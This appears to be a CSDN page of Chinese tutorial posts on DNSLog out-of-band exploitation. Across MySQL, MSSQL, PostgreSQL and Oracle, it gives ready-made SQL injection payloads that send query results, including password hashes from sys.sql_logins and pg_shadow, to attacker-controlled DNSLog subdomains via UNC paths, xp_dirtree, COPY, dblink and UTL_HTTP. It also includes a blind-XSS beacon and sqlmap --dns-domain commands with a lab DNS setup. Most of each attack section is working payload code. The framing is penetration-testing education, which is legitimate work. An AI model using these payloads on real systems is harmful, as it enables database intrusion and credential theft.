dnslog oracle 读文件_oracle dnslog注入 - CSDN
精华内容
参与话题
  • 使用DNSLog进行盲打

    2020-10-19 21:12:59
    在渗透测试中,SQL盲注、命令盲注等漏洞是较难利用的,由于无回显,这类漏洞即使存在也显得有些...DNSLOG是一种回显机制,使用者可以通过DNS解析日志来读取漏洞的回显。 参考文章:使用DNSLOG拯救你的盲打盲注 ...

    目录

    DNSLog 

    SQL盲注回显

    无回显的XSS

    更多盲打Payload


    在渗透测试中,当我们碰到无回显的漏洞是非常难利用的。一是我们不知道存不存在漏洞,二是我们不知道漏洞执行的结果。因此,针对无回显的漏洞,我们可以通过使用DNSLog来进行回显。DNSLog是一种回显机制,攻击者可以通过DNS的解析日志来读取漏洞执行的回显结果。  

    DNSLog 

    首先,我们都知道DNS的解析过程,递归查询和迭代查询相结合,传送门:DNS解析过程

    这里我们可以控制的是域名的DNS服务器,也就是如下的 "baidu.com" 的DNS服务器。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。

    DNSLog部署过程:

    • 申请一个域名,如 xie.com
    • 在我们的VPS上安装并配置DNS服务器
    • 将 xie.com 的DNS服务器设置为我们的VPS地址
    • 这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。

    但是由于部署非常麻烦,所以我们可以通过一些在线的DNSLog平台:

    SQL盲注回显

    不管是布尔类型盲注还是时间盲注,都需要发送大量的数据包去判断数据,而这很可能会触发WAF的防护,因此导致被封IP。所以,如果条件允许,我们可以结合DNSlog来快速的回显数据。MySQL数据库,通过DNSlog盲注需要用到 load_file() 函数,该函数不仅能加载本地文件,同时也能对URL发起请求。因为需要使用 load_file() 函数,所以需要root权限,并且 secure_file_priv 需要为空。传送门:MySQL数据库中的文件操作函数(load_file()、into outfile、into dumpfile)

    Payload如下:

    SELECT LOAD_FILE(CONCAT('\\\\',(要查询的语句),'.xx.xx.xx\\abc'));

    执行的语句 

    DNSLog平台收到的DNS查询

    无回显的XSS

    payload

    <img src=http://hf8r67.dnslog.cn>
    

    DNSLog平台收到的DNS查询

    即可证明存在XSS

    更多盲打Payload

    更多漏洞的Payload,查看ceye的后台,

    参考文章:使用DNSLOG拯救你的盲打盲注 

          

    展开全文
  • SQL注入之利用DNSlog外带盲注回显

    千次阅读 2020-03-31 09:01:33
    0x00 SQL盲注 当我们发现一个站点存在一个没有数据回显的注入点...此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。 0x01 DNSlog利用条件 DBMS中需要有可...

    0x00 SQL盲注

    当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易被网站BANIP,虽然也可以使用代理IP池,但是还是需要一种快速有效的方法来获取数据。

    此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。


    0x01 DNSlog利用条件

    1. DBMS中需要有可用的,能直接或间接引发DNS解析过程的子程序,即使用到UNC
    2. Linux没有UNC路径,所以当处于Linux系统时,不能使用该方式获取数据

    前人总结不同DBMS中使用的方法:

    Microsoft SQL Server

    master…xp_dirtree (用于获取所有文件夹的列表和给定文件夹内部的子文件夹)

    master…xp_fileexist (用于确定一个特定的文件是否存在于硬盘)

    master…xp_subdirs (用于得到给定的文件夹内的文件夹列表)

    Oracle

    GET_HOST_ADDRES (用于检索特定主机的IP)

    UTL_HTTP.REQUEST (从给定的地址检索到的第1-2000字节的数据)

    Mysql

    load_file (读取文件内容并将其作为字符串返回)

    PostgreSQL

    COPY (用于在文件系统的文件和表之间拷贝数据)


    0x02 UNC

    UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器.。UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。UNC路径就是类似\softer这样的形式的网络路径

    格式: \servername\sharename ,其中 servername 是服务器名,sharename 是共享资源的名称。
    目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\servername\sharename\directory\filename


    0x03 DNSlog平台

    • http://www.dnslog.cn
    • http://ceye.io

    也可以自己手动搭建,工具地址:https://github.com/bugscanteam/dnslog/


    0x04 盲注测试

    自己的DNSlog域名为g5ucgd.dnslog.cn

    这里利用自己的websec平台来完成的测试,那这里要注意一点,由于我平台使用的是MySQL,要用到load_file()函数的,它需要当前数据库用户有读权限,并且需要设置secure_file_priv
    在这里插入图片描述
    前端没有回显,只输出了语句,此时直接去看平台。
    在这里插入图片描述
    前面的数字,即为hex(database())
    在这里插入图片描述
    验证后为正确回显。

    payload如下

    admin" union select load_file(concat('\\\\',(select hex(database())),'.g5ucgd.dnslog.cn\\test'))#
    
    • \\\\转义后即为\\
    • select hex(database())为需要的查询语句,用hex()是因为构造UNC时不能有特殊符号,转化一下更好用。
    • .g5ucgd.dnslog.cn\\test转义后就变成了.g5ucgd.dnslog.cn\test,后面的test只是资源名字,随便起。

    拼接起来后就成了\\bvwa.g5ucgd.dnslog.cn\test完全符合UNC的路径标准,解析后在DNSlog平台就能看到数据了。

    注意啦,虽然使用hex()可以解决UNC特殊字符的问题,但是UNC的长度也不能超过128,所以自行看情况使用hex()啦。
    在这里插入图片描述
    比如上图中的root@localhost不用hex()就无法外带的。


    0x05 结束

    好几天没学习了,心里那个苦阿,学习使人快乐!

    展开全文
  • Dnslog在SQL注入中的实战

    千次阅读 2019-01-20 11:05:39
    Dnslog在SQL注入中的实战 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做...

    Dnslog在SQL注入中的实战

    本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。

    本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于Dnslog在SQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。然而在实际的运用中,因为环境的差异,利用也不同。本文详细的记录了在多种常见数据库实际运用过程的一些细节,包括POC的编写和原理,和一些网上没有公开的利用POC。

    Dnslog在SQL注入中的实战

    一、关于DNSlog在Web攻击的利用

    DNSlog在Web漏洞利用中已经是老生常谈的问题,简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。

    二、常用在哪些情况下

    • SQL注入中的盲注
    • 无回显的命令执行
    • 无回显的SSRF

    三、Dnslog攻击的基本原理

    Dnslog攻击的基本原理

    如图所示,作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS的日志,就得到了想要的值。所以我们需要有一个自己的域名,然后在域名商处配置一条NS记录,然后我们在NS服务器上面获取DNS日志即可。

    四、Dnslog在常见数据库中SQL注入的实战

    这里主要列举了4种数据库,MySQL、MSSQL、PostgreSQL、Oracle。

    本次演示一个最常见的注入场景,就是WHERE后面条件处的注入。实验环境有一个test_user表,三个字段id、user、pass。如下

    img

    最后想要达到的目的是通过DNS外带的方式查询到pass字段的内容。

    此处就不再自己搭建一个DNS服务器了,直接用ceye.io这个平台吧,这个平台就集成了Dnslog的功能。

    1. MySQL

    (1) load_file

    MySQL应该是在实战中利用Dnslog最多的,所以先来说说它吧。

    在MySQL中有个一个load_file函数可以用来读取本地的文件。

    http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass)  FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\abc')) 
    

    img

    可以看到test_user中的pass字段的值的Hex码就被查询出来了,为什么这个地方Hex编码的目的就是减少干扰,因为很多事数据库字段的值可能是有特殊符号的,这些特殊符号拼接在域名里是无法做dns查询的,因为域名是有一定的规范,有些特殊符号是不能带入的。

    注意:load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。

    (2) UNC路径

    以下是百度的UNC路径的解释

    其实我们平常在Widnows中用共享文件的时候就会用到这种网络地址的形式

    \\sss.xxx\test\ 
    

    这也就解释了为什么CONCAT()函数拼接了4个\了,因为转义的原因,4个就变\成了2个\,目的就是利用UNC路径。

    tips: 
    

    因为Linux没有UNC路径这个东西,所以当MySQL处于Linux系统中的时候,是不能使用这种方式外带数据的

    2. msSQL

    (1) 先看看网上流传最多的POC:

    DECLARE @host varchar(1024);  SELECT @host=(SELECT TOP 1master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_loginsWHERE name='sa')+'.ip.port.b182oj.ceye.io';  EXEC('master..xp_dirtree"\'+@host+'\foobar$"'); 
    

    这个POC在数据库控制台执行的确是可以得到数据库中sa用户Hex编码之后的Hash的。但是实际要获得我们的test_user的表中的数据的时候,对POC需要一定的加工。

    首先在sqlserver中字段名是不能和自定义函数名字冲突的,如果冲突需要用[]将字段包裹起来,如下图:

    img

    这里的user字段正好和系统的user()函数同名,所以字段需要[]包裹。

    开始和域名拼接,发生如下图的情况

    img

    然后发现拼接起来的字符串有空格,这是因为在sqlserver中当需要字符串拼接的时候,如果字段的值的长度没有达到表结构字段的长度,就会用空格来填充

    img

    这里我的pass字段设置的长度是50,所但是值实际的长度是8,之所以剩余的长度就用空格填充了。这个时候就用想办法去掉空格,查阅手册可以发现rtrim函数是可以去除右边空格的,如下图

    img

    开始编码,前面说过域名是不能带有些特殊字符的,所以我们最好能将查询出来的值编码之后再和域名进行拼接,但是在查阅了sqlserver的手册之后,没有发现可以直接对字符类型进行编码的函数,只有将2进制转换成Hex的函数,所以这里我需要先将字符类型强制转换成varbinary二进制类型,然后再将二进制转化成Hex编码之后的字符类型。先转换成二进制

    img

    再把二进制转换成字符类型的Hex编码

    img

    最后完整的POC就是出来了。

    http://127.0.0.1/mssql.php?id=1; DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass)))  FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io'; EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"'); 
    

    结果如下:

    img

    那为什么网上给的那个POC就是能够获取到sa用户的hash之后的hex码的呢,原因如下:

    img

    因为那个hash字段本来就是二进制类型,所以不需要在经过类型转换了。

    tips:此处有个小问题,因为拼接用到了+号,+号在url中如果不url编码到代码层的时候就成空格了,所以我们需要在提交之前对+号url编码下

    (2) SQLServer中其他的一些可使用函数

    master..xp_fileexist master..xp_subdirs 
    

    这两个用法和前面的用法基本一样,不再赘述。

    OpenRowset() OpenDatasource() 
    

    这两个都是加载远程数据库的函数。

    这个两个函数都需要高权限,而且系统是默认关闭的,需要通过sp_configure去配置高级选项开启功能,开启代码如下:

    exec sp_configure 'show advanced options',1;  reconfigure;  exec sp_configure 'Ad Hoc Distributed Queries',1;  reconfigure; 
    

    所以此处不推荐使用这两个函数,不仅权限要求高而且使用起来也太麻烦,前面三已经够用了。

    3. postgreSQL

    大多数的脚本语言对于PostgreSQL都是支持SQL语句多语句的执行的所以此处就非常方便了,我们可以编写一个自定义的函数和存储过程就好了,和SQLServer类似。1)copy函数的定义

    COPY tablename [ ( column [, ...] ) ]  FROM { 'filename' | STDIN } [ WITH ] [ BINARY ] [ OIDS ] [ DELIMITER [ AS ] 'delimiter' 'null string' ] CSV [ QUOTE [ AS ] 'quote' 'escape' ]  [ FORCE NOT NULL column [, ...] ]  COPY tablename [ ( column [, ...] ) ] TO { 'filename' | STDOUT } [ WITH ] [ BINARY ] [ OIDS ] [ DELIMITER [ AS ] 'delimiter' 'null string' ]  CSV [ QUOTE [ AS ] 'quote' 'escape' ] [ FORCE QUOTEcolumn [, ...] ] 
    

    从定义看出这里是无法嵌套查询,它这里需要直接填入文件名,所以过程就麻烦一点。

    这是网上的POC,整体上没有什么问题。

    DROP TABLE IF EXISTS table_output; CREATE TABLE table_output(content text); CREATE OR REPLACE FUNCTION temp_function()RETURNS VOID AS $$DECLARE exec_cmd TEXT; DECLARE query_result TEXT;BEGINSELECT INTO query_result (SELECT passwdFROM pg_shadow WHERE usename='postgres'); exec_cmd := E'COPY table_output(content)FROM E\'\\\\'||query_result||E'.postgreSQL.nk40ci.ceye.io\\foobar.txt\''; EXECUTE exec_cmd;END;$$ LANGUAGE plpgSQL SECURITY DEFINER;SELECT temp_function(); 
    

    只是需要对数据处理编一下码,此处会用到encode函数,如下

    encode(pass::bytea,’hex’) 
    

    最后完整的POC如下:

    http://127.0.0.1/pgSQL.php?id=1;DROP TABLE IF EXISTS table_output;  CREATE TABLE table_output(content text);  CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;  DECLARE query_result TEXT;  BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);  exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';     EXECUTE exec_cmd;  END; $$ LANGUAGE plpgSQL SECURITY DEFINER;  SELECT temp_function(); 
    

    结果:

    img

    tips:因为这里的copy需要的参数是文件路径,所以这里其实也是利用了UNC路径,因此这个方式也只能在windows下使用

    (2) db_link扩展

    db_link是PostreSQL用来连接其他的数据库的扩展,用法也很简单,而且可以嵌套子查询,那就很方便了

    dblink('连接串', 'SQL语句') 
    
    http://127.0.0.1/pgsql.php?id=1;CREATE EXTENSION dblink;  SELECT * FROM dblink('host='||(select encode(pass::bytea,'hex') from test_user where id =1)||'.vvv.psql.3.nk40ci.ceye.io user=someuser dbname=somedb',  'SELECT version()') RETURNS (result TEXT); 
    

    CREATE EXTENSION dblink; 就是打开这个扩展,因为这个扩展默认是关闭的。

    img

    tips:

    • 在Ubuntu测试的时候dblink扩展不是默认安装的,需要自己安装扩展。
    • Windows下是默认虽然有扩展的,但是默认是不开启的,需要打开扩展。

    4. Oracle

    Oracle的利用方式就太多了,因为Oracle能够发起网络请求的模块是很很多的。

    这里就列举几个吧。

    UTL_HTTP.REQUEST

    select name from test_user where id =1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL; 
    

    img

    img

    DBMS_LDAP.INIT

    select name from test_user where id =1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL; 
    

    HTTPURITYPE

    select name from test_user where id =1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL; 
    

    UTL_INADDR.GET_HOST_ADDRESS

    select name from test_user where id =1 union SELECT UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL;  
    

    tips:oracle是不允许select语句后面没有表的,所以此处可以跟一个伪表dual

    Oracle其他一些能够发起网络请求的模块:

    UTL_HTTP  UTL_TCP  UTL_SMPTP  UTL_URL 
    

    五、总结

    • 有些函数的使用操作系统的限制。
    • dns查询有长度限制,所以必要的时候需要对查询结果做字符串的切割。
    • 避免一些特殊符号的产生,最好的选择就是数据先编码再带出。
    • 注意不同数据库的语法是有差异的,特别是在数据库拼接的时候。
    • 有些操作是需要较高的权限。
    展开全文
  • sqlmap结合dnslog注入

    2020-05-25 18:48:45
    sqlmap结合dnslog注入环境搭建1.phpstudy2.注入点3.配置mysql4.在线doslog网站5.sqlmap结合dnslog安装dns服务器添加转发(关键)复现手工注入sqlmap的--dns-domain参数注入参考文章 环境搭建 1.phpstudy 去官网下载...

    环境搭建

    1.phpstudy

    去官网下载安装

    2.注入点

    test.php

    <?php
    error_reporting(0);
    $link = mysqli_connect('localhost','root','root');
    mysqli_set_charset($link,'utf8');
    mysqli_select_db($link,'seacms');
    $id = $_GET['id'];
    $sql = "select *from sea_admin where id =$id";
    $res = mysqli_query($link,$sql);
    ?>
    
    

    3.配置mysql

    查看配置

    show variables like '%secure%';
    

    在这里插入图片描述
    1、当secure_file_priv为空,就可以读取磁盘的目录。
    2、当secure_file_priv为G:\,就可以读取G盘的文件。
    3、当secure_file_priv为null,load_file就不能加载文件。
    所以修改C:\phpstudy_pro\Extensions\MySQL8.0.12\my.ini
    添加secure_file_priv=""
    重启mysql

    4.在线doslog网站

    http://www.dnslog.cn/
    https://dnslog.io/
    这里使用http://www.dnslog.cn/演示

    5.sqlmap结合dnslog

    因为域名去年过期没有续费,现在买域名还需要实名认证要等几天,这里就本地进行复现
    这里使用三台虚拟机,在公网是一样的效果
    1.kali(使用sqlmap)ip 192.168.164.135
    2.win2008r2(靶机)有注入点 ip 192.168.164.138
    3.win2008r2 (dns服务器)ip 192.168.164.157
    这里1,2的配置和上面一样,3需要设置dns服务器

    安装dns服务器

    在服务器配置角色中选择dns服务器
    在这里插入图片描述
    点击下一步,勾选dns服务器
    在这里插入图片描述
    连续下一步,之后点击安装,等待安装…
    安装完成之后在开始管理工具中选择dns管理器
    右键,属性
    在这里插入图片描述
    在监视中对测试类型打钩
    在这里插入图片描述
    在正常查找区域中右键选择新建区域
    在这里插入图片描述
    设置新建区域名称
    在这里插入图片描述
    继续默认下一步就可以
    进入我们设置的域名,右键,新建主机(A记录)
    在这里插入图片描述
    设置域名,这里的ip地址为kali的ip
    在这里插入图片描述
    继续添加
    在这里插入图片描述
    因为这里是本地模拟,所以需要修改靶机的dns服务器为我们设置的dns服务器
    在这里插入图片描述
    在kali执行

    tcpdump -n port 53
    

    在靶机执行

    ping test.hacker.top
    

    在kali看到了数据包证明成功
    在这里插入图片描述

    添加转发(关键)

    在条件转发器上右键添加条件转发器
    在这里插入图片描述
    ip是kali 的ip,之后点击确定
    在靶机执行

    ping test.hacker1.top
    

    kali有显示即可
    在这里插入图片描述

    复现

    手工注入

    这里是本地复现,所以就直接进行注入,省略了一些基本操作

    http://192.168.164.138/test.php?id=1%20union%20select%206,load_file(concat(%27\\\\%27,(select%20database()),%27.4ixgqh.dnslog.cn\\abc%27)),3,8,5,6,7,8
    

    select%20database()是我们的注入语句
    可以看到在dnslog平台已经有了回显
    在这里插入图片描述

    sqlmap的–dns-domain参数注入

    在这里插入图片描述
    接下来在kali使用sqlmap

    sqlmap -u "http://192.168.164.138/test.php?id=1" --technique=T --dns-domain "hacker1.top" -D seacms --tables
    

    速度非常快就会出现结果
    在这里插入图片描述

    参考文章

    https://www.cnblogs.com/cwkiller/p/12794390.html
    https://www.cnblogs.com/depycode/p/5954904.html
    https://www.cnblogs.com/426-fly/p/11097063.html
    https://blog.csdn.net/xiezuoyong/article/details/97272059

    展开全文
  • dnslog小技巧

    2019-08-12 02:32:52
    一、dnslog利用场景 主要针对无回显的情况。 Sql-Blind RCE SSRF RFI(Remote File Inclusion) 二、原理 将dnslog平台中的特有字段payload带入目标发起dns请求,通过dns解析将请求后的关键信息组合成新的三级域名...
  • 支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 使用说明 第一步:按要求输入要检测的目标URL和选择漏洞类型 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一...
  • 4、Oracle 3.总结 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时, DNS的解析过程示意图 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,...
  • 原理:利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接...
  • CEYE平台使用简介

    千次阅读 2019-08-10 00:26:59
    CEYE简介 ...它可以帮助安全研究人员在测试漏洞时收集信息(例如SSRF/ XXE/ RCE等)。 CEYE的使用场景 CEYE的诞生也是因为它的使用场景而孕育而生的,一般有两种常见的情况会导致许多漏洞扫描工具漏扫: ...
  • Out of Band SQL盲注

    千次阅读 2020-02-21 17:58:24
    使用http://ceye.io/DNSlog获取dns记录 获取自己的Identifier xxxxxx.ceye.io 搭建环境 Windows server 2003 +phpstudy+sqli-labs Payload: and%20load_file(concat(%27\\\\%27,(select database()),%27....
  • 参考文献:...DNSlog在Web攻击的利用 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获得的数据外带出来。 常用...
  • Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp...
  • 渗透攻击红队百科全书

    千次阅读 2020-08-27 20:51:03
    据说原始扫描件有病毒,我就解析 Xref 提取图片然后重新生成了一份。我也拿不到纸质书,根据网上流传的版本加工了一下,不清楚是肯定的。其他的不说了,懂的都懂。 目录 第一章 信息搜集 1.1 主机发现 ...
  • 漫谈-Weblogic-CVE-2020-2551

    千次阅读 2020-05-02 00:27:21
    背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。其中 CVE-2020-2551 漏洞,互联网中公布...
  • CEYE平台的使用

    2019-07-11 03:30:56
    0x01 CEYE 是什么 ...它可以帮助安全研究人员在测试漏洞时收集信息(例如SSRF / XXE / RFI / RCE)。 0x02 CEYE的使用场景 ...漏洞检测或漏洞利用需要进一步的用户或系统交互。...如Payload触发了却不在前...
  • 【安全面试】安全面试总结1

    千次阅读 2018-11-06 14:36:19
    这是我在面试中被问到一些问题,主要偏向基础知识,如有错误,还望指正。 1. sql注入 1. 原理 ...攻击者通过构造一些恶意的SQL语句,让后台的数据库去解析,从而达到入侵目标网络,获取敏感信息 ...
  • SQL注入知识点总结

    2020-10-07 23:27:55
    SQL注入 产生原因:前台与后台进行交互的时候,输入的内容没有经过严格的过滤,造成攻击者可以构造特殊的SQL语句,造成SQL注入攻击 两个关键前提 1、用户能控制输入的内容 ...3、Oracle注入 4、Access注入
  • Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone ...
  • SQL注入

    2020-09-26 16:03:12
    SQL注入 一.SQL注入原理 1.造成的原因 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改...
  • 阶段总结

    2020-05-31 23:29:05
    sql注入 sql注入的本质:是把用户输入的数据当做代码去执行。 sql注入的条件:1.用户能够控制输入 2.... 判断注入的方法:1.and 1=1 and 1=2 页面错误说明存在注入 2.id =1' 引号被执行说明存在注入 ...
1 2
收藏数 39
精华内容 15
关键字:

dnslog oracle 读文件